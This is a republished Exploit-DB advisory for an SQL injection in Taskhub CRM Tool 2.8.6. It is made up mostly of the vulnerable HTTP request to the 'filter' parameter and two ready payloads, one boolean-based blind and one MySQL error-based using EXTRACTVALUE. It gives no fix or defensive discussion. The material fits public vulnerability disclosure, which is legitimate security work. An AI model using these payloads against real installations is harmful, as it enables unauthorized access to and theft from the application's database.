Taskhub CRM Tool 2.8.6 – SQL Injection - 体验盒子

作者： Ahmet Ümit BAYRAM

日期： 2023-08-21

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/51692/

# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
GET /projects?filter=notstarted HTTP/1.1
Host: localhost
Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;
ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
### Parameter & Payloads ###
Parameter: filter (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: filter=notstarted' AND
EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT
(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ